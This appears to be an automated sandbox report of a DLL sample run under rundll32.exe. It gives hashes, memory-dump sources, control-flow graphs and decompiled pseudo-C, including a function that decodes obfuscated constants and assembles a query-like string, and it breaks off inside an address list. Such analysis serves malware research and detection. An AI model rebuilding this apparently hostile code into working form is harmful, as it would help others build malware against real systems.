                                                                                                                                                                                                                                    0x031b96e1
                                                                                                                                                                                                                                    0x031b970e

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: f69545f57300aa8450058caacaf3006ea8dc36646199ea945334babf378ecb86
                                                                                                                                                                                                                                    • Instruction ID: c9ce0f2ea1197f4dbb2c0f2721ab1670a8800f2adba906ea615525181f6f1a82
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f69545f57300aa8450058caacaf3006ea8dc36646199ea945334babf378ecb86
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9F019B9511119ABCB28EFB8E9848CAB7FCAB4C200B1541A2D501DB254F770DA468BA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B2436, Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                                                                                                                    			E031B2436(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t19;
				intOrPtr* _t22;

				_t22 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				_t19 = __imp__; // 0x76d26490
				while(1) {
					_v16 = _t15;
					 *_t19(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t22 + 0xe0))(_t22,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}









                                                                                                                                                                                                                                    0x031b2436
                                                                                                                                                                                                                                    0x031b2443
                                                                                                                                                                                                                                    0x031b2444
                                                                                                                                                                                                                                    0x031b2445
                                                                                                                                                                                                                                    0x031b244c
                                                                                                                                                                                                                                    0x031b2452
                                                                                                                                                                                                                                    0x031b247a
                                                                                                                                                                                                                                    0x031b247b
                                                                                                                                                                                                                                    0x031b247e
                                                                                                                                                                                                                                    0x031b2484
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b2463
                                                                                                                                                                                                                                    0x031b246d
                                                                                                                                                                                                                                    0x031b2474
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b2465
                                                                                                                                                                                                                                    0x031b2468
                                                                                                                                                                                                                                    0x031b2488
                                                                                                                                                                                                                                    0x031b246a
                                                                                                                                                                                                                                    0x031b246a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b246a
                                                                                                                                                                                                                                    0x031b2468
                                                                                                                                                                                                                                    0x031b248f
                                                                                                                                                                                                                                    0x031b2495
                                                                                                                                                                                                                                    0x031b2495
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a3886383ce1259ccbcddf447e855bc089ee2e3b12b1c96de881fbffb24d20c00
                                                                                                                                                                                                                                    • Instruction ID: 60d861cc35900832322650838bb52e5e1c487361cc49b47f6b74ce6521cf1966
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3886383ce1259ccbcddf447e855bc089ee2e3b12b1c96de881fbffb24d20c00
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8F04975C11219EFDB04DB98C488AEDB7B8EF08304F1584AAE502A7601D3B46B89CF61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B8055, Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			_entry_(intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t7;
				void* _t8;
				void* _t9;
				void* _t10;
				void* _t12;

				_t12 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					__imp__(0x31bd23c);
					if(_t4 == 0) {
						E031B970F();
					}
				} else {
					_t7 = _t4 - 1;
					if(_t7 == 0) {
						__imp__(0x31bd23c);
						if(_t7 == 1) {
							_t8 = E031B6A56(_t7, _t9, _t10, _v0); // executed
							if(_t8 != 0) {
								_t12 = 0;
							}
						}
					}
				}
				return _t12;
			}










                                                                                                                                                                                                                                    0x031b805c
                                                                                                                                                                                                                                    0x031b805d
                                                                                                                                                                                                                                    0x031b8060
                                                                                                                                                                                                                                    0x031b808a
                                                                                                                                                                                                                                    0x031b8092
                                                                                                                                                                                                                                    0x031b8094
                                                                                                                                                                                                                                    0x031b8094
                                                                                                                                                                                                                                    0x031b8062
                                                                                                                                                                                                                                    0x031b8062
                                                                                                                                                                                                                                    0x031b8063
                                                                                                                                                                                                                                    0x031b806a
                                                                                                                                                                                                                                    0x031b8072
                                                                                                                                                                                                                                    0x031b8078
                                                                                                                                                                                                                                    0x031b807f
                                                                                                                                                                                                                                    0x031b8081
                                                                                                                                                                                                                                    0x031b8081
                                                                                                                                                                                                                                    0x031b807f
                                                                                                                                                                                                                                    0x031b8072
                                                                                                                                                                                                                                    0x031b8063
                                                                                                                                                                                                                                    0x031b809c

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 9dcbc909a1c51166884f38017a3db077e21d73d2ee254fd042d154c6a93d8919
                                                                                                                                                                                                                                    • Instruction ID: 5786913fe6b5116b44e8fb649c8c556cce53ae5010922665c9cf1c16966ea5da
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9dcbc909a1c51166884f38017a3db077e21d73d2ee254fd042d154c6a93d8919
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8E04F7D2543A15BC739EB789844BDEB77CAB0CFD1F094454F685D4054DB10C48086E1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031BA66E, Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                    			E031BA66E(void* __edx, void* __edi, char _a4) {
				void* _t7;
				void* _t12;

				_t7 = E031B7323(__edx, __edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					_push(_t12);
					_push(_a4);
					_push(__edi);
					L031B5544();
					 *((char*)(_t12 + __edi)) = 0;
					E031B9039(_t7, _a4);
				}
				return _t12;
			}





                                                                                                                                                                                                                                    0x031ba67a
                                                                                                                                                                                                                                    0x031ba67f
                                                                                                                                                                                                                                    0x031ba683
                                                                                                                                                                                                                                    0x031ba685
                                                                                                                                                                                                                                    0x031ba686
                                                                                                                                                                                                                                    0x031ba689
                                                                                                                                                                                                                                    0x031ba68a
                                                                                                                                                                                                                                    0x031ba695
                                                                                                                                                                                                                                    0x031ba699
                                                                                                                                                                                                                                    0x031ba699
                                                                                                                                                                                                                                    0x031ba6a2

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                                                                                                                                                                                                    • Instruction ID: 75ca85c2cb0c885eee4b40b84f0720cd6bc0bcd8da7596157b17d8a3a18be7dd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FE08676504328B7C7126A94DC00EEFBF7DCF49691F044011FE088D100D721D51093E1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031BAC9C, Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E031BAC9C() {

				E031BADE5(0x31bc344, 0x31bd158); // executed
				goto __eax;
			}



                                                                                                                                                                                                                                    0x031bac93
                                                                                                                                                                                                                                    0x031bac9a

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 1acca0b97e9046baed0fe9e2e87218d5448909614e7eafe84278f14da7624a02
                                                                                                                                                                                                                                    • Instruction ID: 17ebbda5dc8cf7653d01666dc2a37692e4aa471a8a1920894713f2b4f63e611c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1acca0b97e9046baed0fe9e2e87218d5448909614e7eafe84278f14da7624a02
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBB01289258201AFF08CD10C2D02CFE023CC8CCA63360811AF000C8104D7400C850031
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031BAC81, Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E031BAC81() {

				E031BADE5(0x31bc344, 0x31bd15c); // executed
				goto __eax;
			}



                                                                                                                                                                                                                                    0x031bac93
                                                                                                                                                                                                                                    0x031bac9a

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: b275c465217d656cf376eeaebb1e6fbe73abd5d99b3ead65ae66e0f50c2b96f9
                                                                                                                                                                                                                                    • Instruction ID: 4160e3618dba6629e2158df706db9d2379a8a83180b02fbddc29bba252c89175
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b275c465217d656cf376eeaebb1e6fbe73abd5d99b3ead65ae66e0f50c2b96f9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25B0128D258101BFF00CD5082E12CFE033CC8CCA63360C52AF400D8004D7400C450031
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B2049, Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 32a4c2cf176a459160c7a1bf02ad5617988d864d7dc1c1910721195f02759e07
                                                                                                                                                                                                                                    • Instruction ID: 4ff2d275170f7992e5ffe5fc3cffee2d7b093c3e06784d76f8b8331f392b9f59
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32a4c2cf176a459160c7a1bf02ad5617988d864d7dc1c1910721195f02759e07
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5B0123A404100AFCA0D6F00ED04F05BB22AB5C710F004110B24448078D73184E0EB35
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Analysis Process: rundll32.exe PID: 4868 Parent PID: 5004 rundll32.exeCOMMON

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 04C3ADE5, Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 0 4c3ade5-4c3ae4a 1 4c3ae6b-4c3ae95 0->1 2 4c3ae4c-4c3ae66 0->2 3 4c3ae97 1->3 4 4c3ae9a-4c3aea6 1->4 8 4c3b01b-4c3b01f 2->8 3->4 5 4c3aeb9-4c3aebb 4->5 6 4c3aea8-4c3aeb3 4->6 9 4c3af63-4c3af6d 5->9 10 4c3aec1-4c3aec8 5->10 6->5 18 4c3affe-4c3b005 6->18 11 4c3af79-4c3af7b 9->11 12 4c3af6f-4c3af77 9->12 14 4c3aeca-4c3aed6 10->14 15 4c3aed8 10->15 16 4c3aff9-4c3affc 11->16 17 4c3af7d-4c3af80 11->17 12->11 14->15 27 4c3af28-4c3af34 14->27 25 4c3aee1-4c3aee5 15->25 16->18 20 4c3af82-4c3af85 17->20 21 4c3afae-4c3afbc 17->21 23 4c3b007-4c3b014 18->23 24 4c3b019 18->24 20->21 26 4c3af87-4c3af92 20->26 21->16 34 4c3afbe-4c3afce 21->34 23->24 24->8 25->27 28 4c3aee7-4c3aef7 25->28 26->21 29 4c3af94-4c3af9a 26->29 37 4c3af36-4c3af3a 27->37 38 4c3af5c 27->38 35 4c3af07-4c3af23 28->35 36 4c3aef9-4c3af05 28->36 29->21 33 4c3af9c-4c3af9f 29->33 33->21 39 4c3afa1-4c3afac 33->39 42 4c3afd0-4c3afd8 34->42 43 4c3afda-4c3afdc 34->43 35->8 36->27 36->35 37->9 41 4c3af3c-4c3af48 37->41 38->9 39->16 39->21 41->9 49 4c3af4a-4c3af5a 41->49 42->43 43->16 46 4c3afde-4c3aff6 43->46 46->16 49->9
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                                    • API String ID: 0-3993045852
                                                                                                                                                                                                                                    • Opcode ID: 50d9980247dc17de92e6280303062191793e3f260dc067c5b675003308d062fe
                                                                                                                                                                                                                                    • Instruction ID: 105154be72ae107b8419f3536e73fca489a614f435dfab61f5e2477ae742e18b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50d9980247dc17de92e6280303062191793e3f260dc067c5b675003308d062fe
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF8129B9A00205AFDB10CF99D884BAEB7F6EB4C312F148129F945E7240EB75EA55CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C38B94, Relevance: .2, Instructions: 245COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 51 4c38b94-4c38ba6 52 4c38ba8 51->52 53 4c38bae-4c38c2c call 4c31c1a call 4c354bc 51->53 52->53 60 4c38c55-4c38c5f call 4c37649 53->60 61 4c38c2e-4c38c4d 53->61 65 4c38c61-4c38c7e 60->65 66 4c38c86-4c38ca0 call 4c39395 60->66 61->60 65->66 70 4c38e63-4c38e67 66->70 71 4c38ca6-4c38cbd 66->71 73 4c38e6f-4c38e76 70->73 74 4c38cc3-4c38d20 call 4c37a80 call 4c38307 71->74 75 4c38e57-4c38e5b 71->75 83 4c38d26-4c38d3d call 4c33cc8 74->83 84 4c38e4b-4c38e4f 74->84 75->70 88 4c38d43-4c38d7a call 4c3809f 83->88 89 4c38e41-4c38e43 83->89 84->75 96 4c38d80-4c38d8e call 4c343df 88->96 97 4c38e79-4c38e80 88->97 89->84 103 4c38dd2-4c38dd9 96->103 104 4c38d90-4c38d9e call 4c3163f 96->104 98 4c38e2d call 4c3a1b0 97->98 102 4c38e32-4c38e3f 98->102 102->89 105 4c38de5-4c38de9 103->105 106 4c38ddb-4c38ddf 103->106 112 4c38da3-4c38dcd call 4c39039 104->112 110 4c38e16-4c38e22 call 4c39039 105->110 111 4c38deb-4c38df0 105->111 109 4c38de1 106->109 106->110 109->105 110->102 118 4c38e24-4c38e2b 110->118 111->110 113 4c38df2-4c38e14 call 4c38f0a call 4c385db 111->113 112->103 113->110 118->98 118->102
                                                                                                                                                                                                                                    C-Code - Quality: 24%
                                                                                                                                                                                                                                    			E04C38B94(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, unsigned int _a8, unsigned int* _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t84;
				intOrPtr* _t86;
				intOrPtr _t92;
				intOrPtr _t99;
				unsigned int _t103;
				signed int _t107;
				intOrPtr* _t108;
				intOrPtr* _t110;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr _t116;
				intOrPtr _t121;
				void* _t125;
				intOrPtr _t127;
				intOrPtr* _t128;
				void* _t129;
				void* _t138;
				void* _t139;
				void* _t140;
				intOrPtr _t141;
				intOrPtr _t143;
				void* _t144;
				intOrPtr* _t146;
				void* _t147;
				intOrPtr* _t148;
				intOrPtr* _t149;
				intOrPtr* _t152;
				void* _t153;
				void* _t155;

				_t138 = __edx;
				_t129 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					__imp__();
				}
				_t60 =  *0x4c3d018; // 0x99d5691b
				asm("bswap eax");
				_t61 =  *0x4c3d014; // 0x3a87c8cd
				_t127 = _a16;
				_t146 =  *0x4c3d120; // 0x73fcc740
				asm("bswap eax");
				_t62 =  *0x4c3d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x4c3d00c; // 0x62819102
				asm("bswap eax");
				_t64 =  *0x4c3d27c; // 0xa6a5a8
				_t3 = _t64 + 0x4c3e633; // 0x74666f73
				_t139 =  *_t146(_t127, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0x4c3d02c,  *0x4c3d004, _t59);
				_t68 =  *0x4c3d27c; // 0xa6a5a8
				_t4 = _t68 + 0x4c3e673; // 0x74707526
				_t71 =  *_t146(_t139 + _t127, _t4, E04C31C1A());
				_t155 = _t153 + 0x38;
				_t140 = _t139 + _t71; // executed
				_t72 = E04C354BC(_t129); // executed
				_t128 = __imp__; // 0x76d25520
				_v8 = _t72;
				if(_t72 != 0) {
					_t121 =  *0x4c3d27c; // 0xa6a5a8
					_t7 = _t121 + 0x4c3e8eb; // 0x736e6426
					_t125 =  *_t146(_a16 + _t140, _t7, _t72);
					_t155 = _t155 + 0xc;
					_t140 = _t140 + _t125;
					 *_t128( *0x4c3d238, 0, _v8);
				}
				_t73 = E04C37649();
				_v8 = _t73;
				if(_t73 != 0) {
					_t116 =  *0x4c3d27c; // 0xa6a5a8
					_t11 = _t116 + 0x4c3e8f3; // 0x6f687726
					 *_t146(_t140 + _a16, _t11, _t73);
					_t155 = _t155 + 0xc;
					 *_t128( *0x4c3d238, 0, _v8);
				}
				_t141 =  *0x4c3d32c; // 0x56a95b0
				_t75 = E04C39395(0x4c3d00a, _t141 + 4);
				_t147 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					 *_t128( *0x4c3d238, _t147, _a16); // executed
					return _v12;
				} else {
					__imp__( *0x4c3d238, 0, 0x800);
					_v8 = _t75;
					if(_t75 == 0) {
						L25:
						 *_t128( *0x4c3d238, _t147, _v20);
						goto L26;
					}
					__imp__();
					E04C37A80(_t75);
					_t80 =  *0x4c3d32c; // 0x56a95b0
					__imp__(_t80 + 0x40);
					asm("lock xadd [eax], ecx");
					_t84 =  *0x4c3d32c; // 0x56a95b0
					__imp__(_t84 + 0x40);
					_t86 =  *0x4c3d32c; // 0x56a95b0
					_t143 = E04C38307(1, _t138, _a16,  *_t86);
					_v28 = _t143;
					asm("lock xadd [eax], ecx");
					if(_t143 == 0) {
						L24:
						 *_t128( *0x4c3d238, _t147, _v8);
						goto L25;
					}
					 *0x4c3d104(_t143, 0x4c3c2ac);
					_push(_t143);
					_t92 = E04C33CC8();
					_v16 = _t92;
					if(_t92 == 0) {
						L23:
						 *_t128( *0x4c3d238, _t147, _t143);
						goto L24;
					}
					_t148 = __imp__; // 0x76d68170
					 *_t148(_t143, _a4);
					 *_t148(_v8, _v20);
					_t149 = __imp__; // 0x76d681d0
					 *_t149(_v8, _v16);
					 *_t149(_v8, _t143);
					_t99 = E04C3809F(0, _v8);
					_a4 = _t99;
					if(_t99 == 0) {
						_v12 = 8;
						L21:
						E04C3A1B0();
						L22:
						 *_t128( *0x4c3d238, 0, _v16);
						_t147 = 0;
						goto L23;
					}
					_t103 = E04C343DF(_t128, 0xffffffffffffffff, _t143,  &_v24); // executed
					_v12 = _t103;
					if(_t103 == 0) {
						_t152 = _v24;
						_t107 = E04C3163F(_t152, _a4, _a8, _a12); // executed
						_v12 = _t107;
						_t108 =  *((intOrPtr*)(_t152 + 8));
						 *((intOrPtr*)( *_t108 + 0x80))(_t108);
						_t110 =  *((intOrPtr*)(_t152 + 8));
						 *((intOrPtr*)( *_t110 + 8))(_t110);
						_t112 =  *((intOrPtr*)(_t152 + 4));
						 *((intOrPtr*)( *_t112 + 8))(_t112);
						_t114 =  *_t152;
						_t103 = E04C39039( *((intOrPtr*)( *_t114 + 8))(_t114), _t152);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t103 = _a8;
							if(_t103 != 0) {
								_t144 =  *_t103;
								_t150 =  *_a12;
								_push( *_a12);
								_push(_t144);
								_push(_t144);
								L04C38F0A();
								_t103 = E04C385DB(_t144, _t144, _t150 >> 1);
								_t143 = _v28;
								 *_a12 = _t103;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E04C39039(_t103, _a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}




















































                                                                                                                                                                                                                                    0x04c38b94
                                                                                                                                                                                                                                    0x04c38b94
                                                                                                                                                                                                                                    0x04c38b94
                                                                                                                                                                                                                                    0x04c38b9f
                                                                                                                                                                                                                                    0x04c38ba6
                                                                                                                                                                                                                                    0x04c38ba8
                                                                                                                                                                                                                                    0x04c38ba8
                                                                                                                                                                                                                                    0x04c38bb5
                                                                                                                                                                                                                                    0x04c38bc0
                                                                                                                                                                                                                                    0x04c38bc3
                                                                                                                                                                                                                                    0x04c38bc8
                                                                                                                                                                                                                                    0x04c38bcb
                                                                                                                                                                                                                                    0x04c38bd1
                                                                                                                                                                                                                                    0x04c38bd4
                                                                                                                                                                                                                                    0x04c38bd9
                                                                                                                                                                                                                                    0x04c38bdc
                                                                                                                                                                                                                                    0x04c38be1
